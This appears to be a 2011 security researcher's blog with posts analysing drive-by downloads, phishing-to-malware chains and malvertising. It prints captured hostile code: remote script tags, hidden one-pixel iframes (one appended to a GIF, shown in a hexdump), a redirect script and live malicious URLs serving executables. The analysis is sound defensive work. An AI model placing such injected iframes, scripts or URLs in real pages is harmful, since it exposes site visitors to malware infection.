Wednesday, December 21, 2011

Blackhole Toolkit drive-by download reversed

So..seeing those "Transaction system failure".  Included in the email is this great tidbit:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="hxxp://bobosbouncytown.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://dzevents-algerie.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://sammy.dommel.be/gogleads.js"></script>
</html>
 

so let's wget one of these and see what we have:

document.location='http://curvechurch.com/main.php?page=4a4fd3141d846cdd';


let's wget THAT and see what we have:





























Yugh...obfuscated javascript...ick.  So let's fire up Malzilla and see what we can do.  I copied the above into the Decoder tab and hit debug.  I get an:
 
aa is not defined 



































Well that stinks.  But I DO get some good info from the Variable State window, so let's change the easy ones:

d="doc";
e='ev';
w=window;
g=fromCharCode';
if(w[d+"ument"])aa=([].unshift+'');
aa=aa.split('').pop();



Still the same "aa is not defined" error after clicking Debug...so lets nuke that if portion to show:
aa=([].unshift+'');































Now we're hot doggin!  Closing the Debug window will give us:
  





So let's see what that eval_temp file is...open up the temp file in note/wordpad, copy ALL of it, create a new Decoder tab in Malzilla and dump it in and Format Code:

































Note the rabbit link.  Now...there's a LOT of crap going on here...pdf/java/flash version checks to name a few.  But what caught my eye was down at the bottom area:





























Let's copy all those comma numbers, go to the Misc Decoders, paste um in.  Don't forget to add a comma at the very start of the string.  Click the Decode Dec(,) button:
Hey hey!  Look at that.  Let's wget THAT link and see what we get:


 
 

Vicheck and Virustotal don't show much...scary:
http://www.virustotal.com/file-scan/report.html?id=453b83d472e378cb306ae282ebeb51765545892637bd087aa2a916df1a3fb934-1324483480

https://www.vicheck.ca/md5query.php?hash=559ccdd2ae813251d28cf6ab15195fff  

Monday, November 14, 2011

Syslog-ng and firewall filtering

So, I use Sagan to pipe firewall hits to a database.  One of the challenges is filtering out certain IP addresses.  The below filter worked for me:

filter f_firewall {
        not (
        program ("firewall" flags(ignore-case))
                and message("Deny" flags(ignore-case))
                        and (
                                message('192.168.' type(string) flags(substring))
                                or message('169.254.' type(string) flags(substring))
                              )
                );
};
 

Monday, June 27, 2011

NACHA Phish

This one just started out just today:

the pdf link actually links to:
hxxp://nacha-reports-domain.com/cancelled-transaction.pdf.exe

Virus detection is spotty:

http://www.virustotal.com/file-scan/report.html?id=967bd9f5dee7c7fbf8f7c95591326470f385265b613a0b15b7617e814c3b115e-1309201304

Saturday, June 25, 2011

Malicous iFrame in gif request

The IDS hit:
15:15:37  [1:2406560:255] ET RBN Known Russian Business Network IP TCP (281) [**] [Classification: Misc Attack] [Priority: 2] {TCP} int.ip:51352 -> 69.4.229.56:80

The httpry info:
magazine.gem-fashion.com      69.4.229.56     http://magazine.gem-fashion.com/wearing-jewelry.html
magazine.gem-fashion.com      69.4.229.56     http://magazine.gem-fashion.com/img/

From wearing-jewelry.html:

            <td align="right" nowrap="nowrap"><label for="comment[comment]">Comment</label></td>
            <td align="left"><textarea name="comment[comment]" cols="50" rows="5" id="comment[comment]" class=""></textarea></td>
          </tr>
          <tr>
            <td colspan="2" align="center" nowrap="nowrap"><table border="0" cellspacing="0" cellpadding="3">
              <tr align="center">
                <td align="right"><img src="http://magazine.gem-fashion.com/img/" border="0" /></td>
                <td align="left"><input type="button" value="Give me another word, please" class="sub" onclick="this.form.submit()" /></td>
              </tr>
            </table>
            </td>

Header and file
GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif

GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.........TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
.a
.I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B.......I..H...9P....n%3
....7E...B..-B...
JhC..H...G...TaX@...D......%.@..!.........l.0.L....3n.r .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:..@...W.#?.r......\x.."L.7..6M..-..?r..@d
..Q]b.......H4.3....&.........^|X.A..s./g........
Y.....O...P.)...@...;..r.p..6y....^..;,w.....i...4..p.x..I..E
...).<2
.......$...... ^.2.vo....`.(..y...B
M<..1
...dm)....y0.~.. ..D...Cs
.'B.#LD.w?..A.F.......b.....4d.0.5..`..9%.....@C.bIs.....R......z...R
.!e.U^.Z..  ..@..@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
b.....B..4;.D.r7........P
eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2.@AA...C......J~ ......
.!..
!p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$....q.\....7D..
..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Hexdump of gif:
         
15:48:15 ~/Forensics/$ hexdump -C index.html.gif
00000000  47 49 46 38 37 61 96 00  1e 00 a5 00 00 04 02 04  |GIF87a..........|
00000010  84 82 84 44 42 44 c4 c2  c4 24 22 24 a4 a2 a4 64  |...DBD...$"$...d|
00000020  62 64 e4 e2 e4 14 12 14  94 92 94 54 52 54 d4 d2  |bd.........TRT..|
00000030  d4 34 32 34 b4 b2 b4 74  72 74 f4 f2 f4 0c 0a 0c  |.424...trt......|
<snip>
00000420  05 37 44 10 86 0d c5 82  7c c7 a4 65 3a 14 c6 60  |.7D.....|..e:..`|
00000430  0e ab ac 85 c8 b0 bd 0b  02 05 2e 9c 2a 33 17 31  |............*3.1|
00000440  f9 1b 58 09 21 84 50 41  cc 3b 17 6d f4 d1 48 1b  |..X.!.PA.;.m..H.|
00000450  1d 04 00 3b 3c 69 66 72  61 6d 65 20 73 72 63 3d  |...;<iframe src=|
00000460  27 68 74 74 70 3a 2f 2f  61 6c 61 71 69 71 2e 6e  |'http://alaqiq.n|
00000470  65 74 2f 71 75 72 61 6e  2f 67 73 74 61 74 61 2f  |et/quran/gstata/|
00000480  69 6e 64 65 78 2e 70 68  70 27 20 77 69 64 74 68  |index.php' width|
00000490  3d 27 31 27 20 68 65 69  67 68 74 3d 27 31 27 20  |='1' height='1' |
000004a0  73 74 79 6c 65 3d 27 76  69 73 69 62 69 6c 69 74  |style='visibilit|
000004b0  79 3a 20 68 69 64 64 65  6e 3b 27 3e 3c 2f 69 66  |y: hidden;'></if|
000004c0  72 61 6d 65 3e                                    |rame>|
000004c5

Monday, June 20, 2011

Federal Tax transfer reject phish

This one is a hoot. Email looks like the below (many blog posts look like this as well currently)



clicking the link will get you a redirect (co.cz...surprise surprise):

Connecting to irs-reports-web-1258store.info|64.202.189.170|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 301 Moved Permanently
Connection: keep-alive
Date: Mon, 20 Jun 2011 14:47:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://uahdflkbhdanf.cz.cc/forum.php?tp=b30225f7d8a8e859
Cache-Control: private
Content-Length: 0
Location: http://uahdflkbhdanf.cz.cc/forum.php?tp=b30225f7d8a8e859 [following]
--2011-06-20 08:47:44-- http://uahdflkbhdanf.cz.cc/forum.php?tp=b30225f7d8a8e859
Resolving uahdflkbhdanf.cz.cc... 89.208.149.215
Connecting to uahdflkbhdanf.cz.cc|89.208.149.215|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Jun 2011 18:46:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.5
Length: unspecified [text/html]
Saving to: `index.html'

Once that's done you'll get a nice taste of FAKEAV...headers:

GET /TAX25379001.pdf.exe HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: irs-web-report.info


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 15:29:32 GMT
Set-Cookie: BX=64qgorh6vupqs&b=3&s=0f; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.irs-web-report.info
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 20 Jun 2011 11:45:11 GMT
Accept-Ranges: bytes
Content-Length: 228864
Content-Type: application/octet-stream
Age: 0
Connection: close
Server: YTS/1.19.8
MZP.....................@...............................................!..L.!..This program must be run under Win32

Latest VirusTotal is spotty...10/32


Update #1
These .info domains are only up for a few moments it seems...attempting to get these later show unresolved. These have been tagged as ZBOT.

Wednesday, June 15, 2011

Driveby #2

Httpry info...
www.mrexcel.com 216.92.17.166 http://www.mrexcel.com/forum/showthread.php?t=53064
www.tranatunbh.dumb1.com 95.143.195.134 http://www.tranatunbh.dumb1.com/or.js?excel
www.mindrkolk.co.tv 88.198.41.180 http://www.mindrkolk.co.tv/mi6djcb0/?2

Headers...
GET /or.js?excel HTTP/1.1
Host: www.tranatunbh.dumb1.com
Accept: */*
Referer: http://www.mrexcel.com/forum/showthread.php?t=53064
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 22:01:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: RFC=md5hash10134976; expires=Tue, 21-Jun-2011 22:01:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 129
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/javascript

From dumb1.com...
document.write(" border="0" src="http://www.mindrkolk.co.tv/mi6djcb0/?2" frameborder="0" height="1" width="1">

Drive by #1

IDS hits..yay
06/14-12:34:57.964011 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:05.076928 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:35.705572 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:48.121428 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:52.852374 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80

httpry
www.markandchappell.com 194.125.149.132 http://www.markandchappell.com/us/index.html
indometastan.in 195.43.94.64 http://indometastan.in/in.cgi?default

Malicious iFrame on the end of index.html
iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'>

Friday, June 10, 2011

Standard SEO with a dash of driveby

Web path:
http://compromisedsite.com/casseroles-how-to-write-a-letter-of-congratulations-on-high/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZv
/a1c4BaHRw==
http://wmodmon.ce.ms/lots'ofakeav gifs/pngs/jpgs
http://wmodmon.ce.ms/ <- the naughty exe


Here's the script that was hosted on compromisedsite.com
var url = "http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw=="; function goToOtherPlace() {.if (window!=top) {top.location.href = url;} else { document.location= url;} } window.setTimeout(goToOtherPlace, 10);



This httpry shows that wmodmon.ce.ms was the referrer:
ajax.googleapis.com /ajax/libs/jquery/1.4.2/jquery.min.js http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw== - -

Sanitized headers of get jquery.min.js:
GET /ajax/libs/jquery/1.4.2/jquery.min.js HTTP/1.1
Host: ajax.googleapis.com
Accept: */*
Referer: http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 15 Feb 2010 23:30:12 GMT
Date: Wed, 08 Jun 2011 09:19:23 GMT
Expires: Thu, 07 Jun 2012 09:19:23 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 40917
Transfer-Encoding: chunked


Sanitized headers of exe get:
GET / HTTP/1.1
Host: wmodmon.ce.ms
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Disposition: attachment; filename="InstallSecurityCentral_477.exe"
Content-Type: application/force-download
Date: Wed, 08 Jun 2011 21:42:02 GMT
Server: Apache
Content-Length: 287440


MZ......................@...............................................!..L.!This program cannot be run in DOS mode.